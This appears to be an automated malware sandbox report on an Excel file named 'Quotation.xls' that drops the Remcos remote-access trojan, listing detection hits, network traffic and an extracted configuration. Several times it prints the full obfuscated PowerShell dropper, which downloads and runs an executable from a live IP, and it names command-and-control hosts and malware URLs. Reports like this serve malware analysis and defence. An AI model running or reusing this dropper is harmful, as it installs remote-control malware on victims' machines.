IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3400, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", ProcessId: 3512, ProcessName: csc.exe
            Sigma detected: Excel Network Connections
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2932, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3400, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe
            Sigma detected: Suspicious Office Outbound Connections
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2932, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3400, TargetFilename: C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2932, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))", CommandLine: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3400, TargetFilename: C:\Users\user\AppData\Local\Temp\pyktbusk.55o.ps1

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3400, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", ProcessId: 3512, ProcessName: csc.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-26T09:29:59.517525+0200
            SID:2024449
            Source Port:49166
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted User Privilege Gain
            Timestamp:2024-07-26T09:30:09.356706+0200
            SID:2011803
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:Executable code was detected
            Timestamp:2024-07-26T09:30:09.273433+0200
            SID:2011803
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:Executable code was detected
            Timestamp:2024-07-26T09:30:09.273485+0200
            SID:2011803
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:Executable code was detected
            Timestamp:2024-07-26T09:30:09.273537+0200
            SID:2011803
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:Executable code was detected
            Timestamp:2024-07-26T09:29:59.517585+0200
            SID:2024197
            Source Port:80
            Destination Port:49166
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T09:29:57.196366+0200
            SID:2024449
            Source Port:49164
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted User Privilege Gain
            Timestamp:2024-07-26T09:29:57.196370+0200
            SID:2024197
            Source Port:80
            Destination Port:49164
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T09:30:09.273467+0200
            SID:2011803
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:Executable code was detected
            Timestamp:2024-07-26T09:30:08.658935+0200
            SID:2011803
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:Executable code was detected
            Timestamp:2024-07-26T09:30:09.544003+0200
            SID:2009080
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T09:30:16.371974+0200
            SID:2036594
            Source Port:49168
            Destination Port:2558
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-26T09:30:20.216815+0200
            SID:2803304
            Source Port:49169
            Destination Port:80
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-26T09:30:09.273374+0200
            SID:2011803
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:Executable code was detected
            Timestamp:2024-07-26T09:30:09.356737+0200
            SID:2011803
            Source Port:80
            Destination Port:49167
            Protocol:TCP
            Classtype:Executable code was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for domain / URL
            Source: tny.wtfVirustotal: Detection: 5%Perma Link
            Source: http://107.173.143.46/T2507F/csrss.exepVirustotal: Detection: 12%Perma Link
            Source: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC:Virustotal: Detection: 5%Perma Link
            Source: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaxVirustotal: Detection: 5%Perma Link
            Source: http://107.173.143.46/T2507F/csrss.exeVirustotal: Detection: 12%Perma Link
            Source: http://107.173.143.46/T2507F/csrVirustotal: Detection: 12%Perma Link
            Source: http://tny.wtf/Virustotal: Detection: 5%Perma Link
            Source: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.htaVirustotal: Detection: 5%Perma Link
            Source: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exeVirustotal: Detection: 21%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Quotation.xlsReversingLabs: Detection: 18%
            Source: Quotation.xlsVirustotal: Detection: 24%Perma Link
            Yara detected Remcos RAT
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR
            Machine Learning detection for sample
            Source: Quotation.xlsJoe Sandbox ML: detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,25_2_00433837
            Source: winiti.exe, 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8d93157b-0

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR

            Privilege Escalation

            barindex
            Contains functionality to bypass UAC (CMSTPLUA)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004074FD _wcslen,CoGetObject,25_2_004074FD

            Phishing

            barindex
            Yara detected obfuscated html page
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta, type: DROPPED
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.pdb source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.pdbhPD source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.pdbhPE source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.pdb source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,25_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0044E879 FindFirstFileExA,25_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,25_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040783C FindFirstFileW,FindNextFileW,25_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,25_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,25_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,25_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,25_2_00407C97

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficDNS query: name: unifrieghtmovers.com
            Source: global trafficDNS query: name: geoplugin.net
            Source: global trafficDNS query: name: geoplugin.net
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 178.237.33.50:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
